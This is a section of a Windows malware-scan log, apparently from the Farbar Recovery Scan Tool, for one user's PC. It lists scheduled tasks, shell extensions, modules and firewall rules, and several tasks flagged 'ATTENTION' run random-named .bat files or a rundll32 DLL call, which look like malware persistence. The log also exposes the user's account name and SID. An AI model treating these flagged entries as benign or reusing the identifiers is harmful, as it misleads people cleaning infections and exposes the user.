CustomCLSID: HKU\S-1-5-21-1787623747-1286628437-3931833605-1001_Classes\CLSID\{590C4387-5EBD-4D46-8A84-CD0BA2EF2856}\InprocServer32 -> C:\Users\ouroboros\AppData\Local\Google\Update\1.3.30.3\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1787623747-1286628437-3931833605-1001_Classes\CLSID\{59B55F04-DE14-4BB8-92FF-C4A22EF2E5F4}\InprocServer32 -> C:\Users\ouroboros\AppData\Local\Google\Update\1.3.31.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1787623747-1286628437-3931833605-1001_Classes\CLSID\{724FE766-71C2-4E6E-8379-CD0EF5E51BDD}\InprocServer32 -> C:\Users\ouroboros\AppData\Local\Google\Update\1.3.28.17\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1787623747-1286628437-3931833605-1001_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247}\InprocServer32 -> C:\Users\ouroboros\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1787623747-1286628437-3931833605-1001_Classes\CLSID\{8C46158B-D978-483C-A312-16EE5013BE04}\InprocServer32 -> C:\Users\ouroboros\AppData\Local\Google\Update\1.3.33.3\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1787623747-1286628437-3931833605-1001_Classes\CLSID\{91A41FCC-BC02-42D8-A36E-0D27FF9BFFC8}\InprocServer32 -> C:\Users\ouroboros\AppData\Local\Google\Update\1.3.33.7\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1787623747-1286628437-3931833605-1001_Classes\CLSID\{CB492AF1-2CEF-4E58-BE47-471C77D0C8BA}\InprocServer32 -> C:\Users\ouroboros\AppData\Local\Google\Update\1.3.32.7\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1787623747-1286628437-3931833605-1001_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2}\InprocServer32 -> C:\Users\ouroboros\AppData\Local\Google\Update\1.3.29.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1787623747-1286628437-3931833605-1001_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\ouroboros\AppData\Local\Google\Update\1.3.33.7\psuser_64.dll (Google Inc.)
ShellIconOverlayIdentifiers: [!AsusWSShellExt_B] -> {6D4133E5-0742-4ADC-8A8C-9303440F7191} => C:\Program Files (x86)\Common Files\AWS\2.2.2.524\ASUSWSShellExt64.dll [2015-04-22] (ASUS Cloud Corporation.)
ShellIconOverlayIdentifiers: [!AsusWSShellExt_O] -> {64174815-8D98-4CE6-8646-4C039977D809} => C:\Program Files (x86)\Common Files\AWS\2.2.2.524\ASUSWSShellExt64.dll [2015-04-22] (ASUS Cloud Corporation.)
ShellIconOverlayIdentifiers: [!AsusWSShellExt_U] -> {1C5AB7B1-0B38-4EC4-9093-7FD277E2AF4E} => C:\Program Files (x86)\Common Files\AWS\2.2.2.524\ASUSWSShellExt64.dll [2015-04-22] (ASUS Cloud Corporation.)
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov)
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files\Notepad++\NppShell_06.dll [2017-03-08] ()
ContextMenuHandlers1: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => C:\ProgramData\Microsoft\Windows Defender\platform\4.12.17007.17123-0\ShellExt.dll [2017-09-29] (Microsoft Corporation)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-01-21] (Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-01-21] (Alexander Roshal)
ContextMenuHandlers2: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => C:\ProgramData\Microsoft\Windows Defender\platform\4.12.17007.17123-0\ShellExt.dll [2017-09-29] (Microsoft Corporation)
ContextMenuHandlers3: [BackupContextMenuExtension] -> {b1b96b20-da1d-4a3c-92c1-7229b32f2326} => C:\Windows\system32\mscoree.dll [2017-09-29] (Microsoft Corporation)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2017-11-01] (Malwarebytes)
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov)
ContextMenuHandlers4: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => C:\ProgramData\Microsoft\Windows Defender\platform\4.12.17007.17123-0\ShellExt.dll [2017-09-29] (Microsoft Corporation)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\system32\nvshext.dll [2017-12-16] (NVIDIA Corporation)
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2017-11-01] (Malwarebytes)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-01-21] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-01-21] (Alexander Roshal)
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {01526271-4AF5-41E5-AAA2-91AC8730883B} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [2017-12-16] (NVIDIA Corporation)
Task: {0276EF6C-596A-4009-B3DB-2D1F3B77477D} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1787623747-1286628437-3931833605-1001Core1d25850ca9ee9a0 => C:\Users\ouroboros\AppData\Local\Google\Update\GoogleUpdate.exe [2015-12-22] (Google Inc.)
Task: {03F790A5-0D1B-4062-A902-60A477FE2F1E} - System32\Tasks\DropboxOEM => C:\Program Files (x86)\Dropbox\DropboxOEM\DropboxOEM.exe [2015-05-30] ()
Task: {077E5A99-5546-4F28-B89D-EBB337EC68C3} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1787623747-1286628437-3931833605-1001UA => C:\Users\ouroboros\AppData\Local\Google\Update\GoogleUpdate.exe [2015-12-22] (Google Inc.)
Task: {10910DF4-2930-4E0E-82C7-3774042C87B2} - System32\Tasks\ASUS Live Update2 => C:\Program Files (x86)\ASUS\ASUS Live Update\UpdateChecker.exe [2016-08-01] ()
Task: {15D126BE-EE3D-4685-B6AD-3BAD9CB19C8A} - System32\Tasks\RtHDVBg_ListenToDevice => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2016-05-26] (Realtek Semiconductor)
Task: {16BC19F1-0972-4AEB-B0A5-FD248773B648} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-09-27] (Adobe Systems Incorporated)
Task: {29DF41C2-260A-4843-9F84-0582F7D67A33} - System32\Tasks\Intel\Thunderbolt\Start Thunderbolt application when hardware is detected => Thunderbolt.exe
Task: {2C7F6B76-9D1D-44CD-BD7B-DE87A5BCA275} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\root\Office16\msoia.exe [2017-12-19] (Microsoft Corporation)
Task: {3282642F-EAB2-48E3-B711-AC1DC1262BA9} - System32\Tasks\gxx speed launcher => C:\Program Files (x86)\Garena\Garena\Garena.exe [2017-12-14] (Garena Online )
Task: {35132BB3-FD69-4686-9C29-7A77261C4433} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [2017-12-16] (NVIDIA Corporation)
Task: {398E9422-D9FF-47F4-B107-4FBA8DE168A9} - System32\Tasks\Update Checker => C:\Program Files (x86)\ASUS\ASUS Live Update\UpdateChecker.exe [2016-08-01] ()
Task: {48B249A3-CB93-4D76-8D88-A4914D3D63E1} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.12.17007.17123-0\MpCmdRun.exe [2017-12-07] (Microsoft Corporation)
Task: {4952CF65-ABCB-4BFE-B7E1-11278DD76895} - System32\Tasks\ROG Gaming Center => C:\Program Files (x86)\ASUS\ROG Gaming Center\ROGGamingKey.exe [2015-08-13] (ASUSTek Computer Inc.)
Task: {49BBE57F-CA9D-47A8-8B2C-BCEF4DC52899} - System32\Tasks\AdobeAAMUpdater-1.0-ENJAY-ouroboros => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2015-04-28] (Adobe Systems Incorporated)
Task: {4BDF7E76-D0B0-475B-A7F6-3247BC93E5ED} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.12.17007.17123-0\MpCmdRun.exe [2017-12-07] (Microsoft Corporation)
Task: {5373EE26-650E-4494-9A89-DBDE73772E14} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_28_0_0_126_pepper.exe [2017-12-14] (Adobe Systems Incorporated)
Task: {55A4A116-810E-4EB9-A283-07E1A4D4A39A} - System32\Tasks\aoIYY => C:\WINDOWS\aVPIeFZA.bat [2017-09-29] () <==== ATTENTION
Task: {5A0EBFE4-70EE-40FE-BFAE-96770200C8DC} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerLogon => C:\Program Files\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2017-12-19] (Microsoft Corporation)
Task: {5BF52A6A-7B40-41FA-BBB2-E91FC90C2640} - System32\Tasks\ASUS Smart Gesture Launcher => C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPLauncher.exe [2015-08-18] (AsusTek)
Task: {5E6F53DA-A2BA-465F-BB25-AEBD1FE3C76C} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-12-16] (NVIDIA Corporation)
Task: {5EEFCC30-B7D9-4C61-8FE6-8EC80B1B3448} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2017-12-07] (Microsoft Corporation)
Task: {61B66AB0-E128-404B-B048-C2D3AECB222F} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\root\Office16\msoia.exe [2017-12-19] (Microsoft Corporation)
Task: {636241A3-079A-4268-B91A-15A95F5272A8} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-12-14] (Adobe Systems Incorporated)
Task: {64A07B04-D21B-486D-A2CC-BECBA468593B} - System32\Tasks\ASUS Live Update1 => C:\Program Files (x86)\ASUS\ASUS Live Update\UpdateChecker.exe [2016-08-01] ()
Task: {6AFEEB9D-E977-4D4F-945F-B58706D58EA5} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION
Task: {6BF1664A-9C55-4F53-AA2B-7A328CB86374} - System32\Tasks\ASUS\ASUS Product Register Service => C:\Program Files (x86)\ASUS\APRP\aprp.exe [2015-05-15] (ASUSTek Computer Inc.)
Task: {6F410B9E-DEC0-4BD4-95F4-D534071764F2} - System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-12-16] (NVIDIA Corporation)
Task: {7318097E-EEA3-45E5-BFFB-A5D4ADD83F88} - System32\Tasks\RfumFuaEoEEe => C:\Program Files (x86)\Common Files\CyIPiOCiIR.exe
Task: {77AE7A0E-9348-4CC4-BFE0-048A56AA8930} - System32\Tasks\WpsUpdateTask_ouroboros => C:\Program Files (x86)\Kingsoft\WPS Office\9.1.0.4758\wtoolex\wpsupdate.exe [2015-12-21] (Zhuhai Kingsoft Office Software Co.,Ltd)
Task: {86818A98-AC23-44B6-BB61-AC16EC20799A} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1787623747-1286628437-3931833605-1001Core => C:\Users\ouroboros\AppData\Local\Google\Update\GoogleUpdate.exe [2015-12-22] (Google Inc.)
Task: {905CDEB9-785B-47FD-9F86-CBEC72887F6A} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerRegistration => C:\Program Files\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2017-12-19] (Microsoft Corporation)
Task: {911D5428-90B3-4531-A294-C4CB7ADE6F28} - System32\Tasks\ASUS ROG Macro Key Listener => C:\Program Files (x86)\ASUS\ROG MacroKey\AsListen.exe [2015-08-12] (ASUS)
Task: {967AB1C0-E928-488C-B9B6-151D9B06E92A} - System32\Tasks\WpsNotifyTask_ouroboros => C:\Program Files (x86)\Kingsoft\WPS Office\9.1.0.4758\wtoolex\wpsnotify.exe [2015-12-21] (Zhuhai Kingsoft Office Software Co.,Ltd)
Task: {9B352D76-756D-4808-B409-51E34EB2B0FF} - System32\Tasks\ATK Package A22126881260 => C:\Program Files (x86)\SplitmediaLabs\XSplit Gamecaster\XSplit.Gamecaster.exe [2015-08-05] (SplitmediaLabs)
Task: {9CA2C0D1-09A1-4A98-8FE2-ED0B0430B3FB} - System32\Tasks\Intel\Thunderbolt\Start Thunderbolt service when hardware is detected => sc.exe start ThunderboltService
Task: {A6B31F1B-96A3-4307-A365-96A4BF0E6531} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.12.17007.17123-0\MpCmdRun.exe [2017-12-07] (Microsoft Corporation)
Task: {AA44E743-DC30-46FD-830D-92AF8F18D213} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2017-12-07] (Microsoft Corporation)
Task: {ADDDC893-66F7-4C7F-A549-9E7F00364548} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [2017-12-16] (NVIDIA Corporation)
Task: {B06EB407-984B-416E-BC49-D27A42D3E333} - \{6FEFFD84-0D29-0B78-4530-415A173AA131} -> No File <==== ATTENTION
Task: {B6832571-D883-4CC6-8493-21772C51A76B} - System32\Tasks\ASUS USB Charger Plus => C:\Program Files (x86)\ASUS\USBChargerPlus\USBChargerPlus.exe [2015-05-26] (ASUSTek Computer Inc.)
Task: {B7937A1E-D9E3-418A-BE24-FCAD9233ED54} - System32\Tasks\ATK Package 36D18D69AFC3 => C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\SimAppExec.exe [2015-03-11] (ASUSTek Computer Inc.)
Task: {BBEC4C2E-18EF-4C1A-AB04-9B574DF34E5E} - System32\Tasks\SS2svc64Run => C:\Program Files\ASUSTeKcomputer.Inc\SS2\UserInterface\x64\SS2svc64.exe [2015-08-15] ()
Task: {C0619711-DDB5-4844-B929-881F36A1C478} - System32\Tasks\ouroborosNobbleAbsorbsV2 => rundll32.exe NonrealisticPredefining.dll,main 7 1 <==== ATTENTION
Task: {C06E8482-AA9F-4398-B68B-5ED4B6A20BE7} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.12.17007.17123-0\MpCmdRun.exe [2017-12-07] (Microsoft Corporation)
Task: {CD4525D1-A007-4400-AB52-16535100A9ED} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-12-16] (NVIDIA Corporation)
Task: {D0EADF71-FA97-4ADE-A606-C27294C27102} - System32\Tasks\WpsNotifyTask_Administrator => C:\Program Files (x86)\Kingsoft\WPS Office\9.1.0.4947\wtoolex\wpsnotify.exe
Task: {D5AB103A-8C84-4084-AAD3-A72F007ABC05} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [2017-12-16] (NVIDIA Corporation)
Task: {D72EA3C5-389F-471C-9E8C-99DAD5F11C61} - System32\Tasks\Jasic => C:\Program Files (x86)\Common Files\rYms.bat [2017-09-29] () <==== ATTENTION
Task: {D7C80893-5758-4117-9BBA-09936DBD8BBA} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-12-16] (NVIDIA Corporation)
Task: {DB30FF0D-0C00-4B45-85E6-F323A2D50D9D} - System32\Tasks\RTKCPL => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [2016-05-26] (Realtek Semiconductor)
Task: {E1509710-0B3B-4C09-AEEE-598A6A38638E} - System32\Tasks\Intel\Thunderbolt\Start Thunderbolt service on boot if driver is up => tbtsvc.exe
Task: {E416FB5B-199F-4AB0-B5F3-7D0F62078880} - System32\Tasks\SS2svc32Run => C:\Program Files\ASUSTeKcomputer.Inc\SS2\UserInterface\SS2svc32.exe [2015-08-15] ()
Task: {E523299F-4091-4D73-9C1B-46399571E496} - System32\Tasks\ASUS Splendid ACMON => C:\Program Files (x86)\ASUS\Splendid\ACMON.exe [2015-08-26] (ASUS)
Task: {F208018C-7163-49EA-A9D0-FECE735F78D2} - System32\Tasks\WpsUpdateTask_Administrator => C:\Program Files (x86)\Kingsoft\WPS Office\9.1.0.4947\wtoolex\wpsupdate.exe
Task: {F32A0984-B9DC-41B7-8FE3-6711EFB9B7A2} - System32\Tasks\SS2UILauncherRun => C:\Program Files\ASUSTeKcomputer.Inc\SS2\UserInterface\SS2UILauncher.exe [2015-08-15] ()
Task: {F4A4C59F-DFBE-458F-9A6C-23852DCD32F6} - System32\Tasks\Intel\Thunderbolt\Start Thunderbolt application on login if service is up => Thunderbolt.exe
Task: {F92A7233-CEE5-448D-97E7-652FEC88BD58} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1787623747-1286628437-3931833605-1001UA1d25850cac0e0a0 => C:\Users\ouroboros\AppData\Local\Google\Update\GoogleUpdate.exe [2015-12-22] (Google Inc.)
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1787623747-1286628437-3931833605-1001Core.job => C:\Users\ouroboros\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1787623747-1286628437-3931833605-1001UA.job => C:\Users\ouroboros\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\WpsNotifyTask_Administrator.job => C:\Program Files (x86)\Kingsoft\WPS Office\9.1.0.4947\wtoolex\wpsnotify.exe
Task: C:\WINDOWS\Tasks\WpsNotifyTask_ouroboros.job => C:\Program Files (x86)\Kingsoft\WPS Office\9.1.0.4758\wtoolex\wpsnotify.exe
Task: C:\WINDOWS\Tasks\WpsUpdateTask_Administrator.job => C:\Program Files (x86)\Kingsoft\WPS Office\9.1.0.4947\wtoolex\wpsupdate.exe
Task: C:\WINDOWS\Tasks\WpsUpdateTask_ouroboros.job => C:\Program Files (x86)\Kingsoft\WPS Office\9.1.0.4758\wtoolex\wpsupdate.exe
Task: C:\WINDOWS\Tasks\{447123AD-7416-1893-A863-7ED1A81B6B4D}.job => C:\Users\OUROBO~1\AppData\Local\447123~1\Sync.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\{6FEFFD84-0D29-0B78-4530-415A173AA131}.job => C:\Users\OUROBO~1\AppData\Local\Geburo\SYNCVE~1.EXE
 
==================== Shortcuts & WMI ========================
 
(The entries could be listed to be restored or removed.)
 
 
ShortcutWithArgument: C:\Users\ouroboros\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\588bca4700aecad0\Montaro.lnk -> D:\Steam\steamapps\common\Montaro\nw.exe (The NWJS Community) -> --user-data-dir="C:\Users\ouroboros\AppData\Local\Montaro\User Data" --profile-directory=Default --app-id=pionmdlpdbkonlgpimjbaminkcbdgjnm
 
==================== Loaded Modules (Whitelisted) ==============
 
2017-09-29 21:41 - 2017-09-29 21:41 - 000184432 _____ () C:\WINDOWS\SYSTEM32\inputhost.dll
2017-05-14 19:35 - 2017-12-16 08:23 - 001267136 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\libprotobuf.dll
2015-05-20 01:11 - 2015-05-20 01:11 - 000007680 _____ () C:\Program Files (x86)\Intel\Intel® Security Assist\isaHelperService.exe
2018-01-03 14:45 - 2017-11-29 09:11 - 002301384 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\SelfProtectionSdk.dll
2018-01-03 14:45 - 2017-11-29 09:11 - 002358728 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\MwacLib.dll
2015-12-17 18:38 - 2015-12-17 18:38 - 000085800 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2015-12-17 18:38 - 2015-12-17 18:38 - 001328912 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2016-05-15 23:17 - 2017-12-19 08:16 - 008935088 _____ () C:\Program Files\Microsoft Office\root\Office16\1033\GrooveIntlResource.dll
2017-03-08 10:42 - 2017-03-08 10:42 - 000230064 _____ () C:\Program Files\Notepad++\NppShell_06.dll
2017-04-26 19:10 - 2015-05-27 06:33 - 001347264 ____N () C:\Program Files\Tablet\Wacom\libxml2.dll
2017-12-13 03:18 - 2017-11-26 20:23 - 011044864 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2017-12-13 03:18 - 2017-11-26 20:01 - 001804288 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2018-01-03 09:59 - 2018-01-03 10:02 - 000086528 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_12.13.257.0_x64__kzf8qxf38zg5c\SkypeHost.exe
2018-01-03 09:59 - 2018-01-03 10:02 - 000195072 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_12.13.257.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll
2018-01-03 09:59 - 2018-01-03 10:03 - 024670720 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_12.13.257.0_x64__kzf8qxf38zg5c\SkyWrap.dll
2018-01-03 09:59 - 2018-01-03 10:02 - 002550272 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_12.13.257.0_x64__kzf8qxf38zg5c\skypert.dll
2018-01-05 08:51 - 2018-01-03 17:20 - 002873688 _____ () C:\Users\ouroboros\AppData\Local\Google\Chrome\Application\63.0.3239.132\swiftshader\libglesv2.dll
2018-01-05 08:51 - 2018-01-03 17:20 - 000137048 _____ () C:\Users\ouroboros\AppData\Local\Google\Chrome\Application\63.0.3239.132\swiftshader\libegl.dll
2017-10-13 14:46 - 2017-10-13 14:46 - 000266424 _____ () C:\Program Files (x86)\Garena\Garena\2.0.1712.1422\libprotobuf-lite.dll
2017-12-14 23:04 - 2017-12-14 23:04 - 001442112 _____ () C:\Program Files (x86)\Garena\Garena\2.0.1712.1422\libs\gxx_pipe_engine.dll
2017-12-14 23:04 - 2017-12-14 23:04 - 002206528 _____ () C:\Program Files (x86)\Garena\Garena\2.0.1712.1422\libs\FSFileSytem.dll
2015-08-26 01:40 - 2015-08-26 01:40 - 000027648 _____ () C:\Program Files (x86)\ASUS\Splendid\DetectDisplayDC.dll
2015-08-26 01:40 - 2015-08-26 01:40 - 000124928 _____ () C:\Program Files (x86)\ASUS\Splendid\CCTAdjust.dll
2017-05-14 19:35 - 2017-12-16 08:23 - 001040320 _____ () C:\Program Files (x86)\NVIDIA Corporation\NvContainer\libprotobuf.dll
2015-09-19 15:34 - 2015-09-19 15:34 - 001243936 _____ () C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\ACE.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
 
==================== Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\Software\Classes\regfile: regedit.exe "%1" <==== ATTENTION
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
 
==================== Hosts content: ===============================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2015-07-10 19:04 - 2016-07-26 23:08 - 000000824 _____ C:\WINDOWS\system32\Drivers\etc\hosts
 
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\Control Panel\Desktop\\Wallpaper -> c:\windows\web\wallpaper\windows\img0.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
HKLM\...\StartupApproved\Run: => "SS2UILauncher"
HKLM\...\StartupApproved\Run: => "iTunesHelper"
HKLM\...\StartupApproved\Run: => "AdobeAAMUpdater-1.0"
HKLM\...\StartupApproved\Run32: => "WebStorage"
HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched"
HKLM\...\StartupApproved\Run32: => "AdobeCS6ServiceManager"
HKLM\...\StartupApproved\Run32: => "CancelAutoPlay_df"
HKLM\...\StartupApproved\Run32: => "CheckNDISPortF0ac46"
HKLM\...\StartupApproved\Run32: => "SwitchBoard"
HKLM\...\StartupApproved\Run32: => "Syncios device service"
HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\...\StartupApproved\Run: => "Skype"
HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\...\StartupApproved\Run: => "CyberGhost"
HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\...\StartupApproved\Run: => "Google Update"
HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\...\StartupApproved\Run: => "Steam"
HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\...\StartupApproved\Run: => "GarenaPlus"
HKU\S-1-5-21-1787623747-1286628437-3931833605-1001\...\StartupApproved\Run: => "Chromium"
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [UDP Query User{416F9B2D-79D4-4749-91A1-9A921BB648D9}D:\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe] => (Allow) D:\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe
FirewallRules: [TCP Query User{3E15C1B7-EADD-41BF-9EDD-277FE3B77EF1}D:\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe] => (Allow) D:\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe
FirewallRules: [{8F1BC006-A16E-4359-B0F2-FD1646DD28CF}] => (Allow) D:\Steam\steamapps\common\PUBG\TslGame\Binaries\Win64\TslGame_BE.exe
FirewallRules: [{DFCB4F00-3BC9-4E57-966E-78888AE82F18}] => (Allow) D:\Steam\steamapps\common\PUBG\TslGame\Binaries\Win64\TslGame_BE.exe
FirewallRules: [{5E48DA43-51D8-4DB3-BF64-331F11D5243D}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{F38F5757-98A4-489F-8F10-804186FA3F0C}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
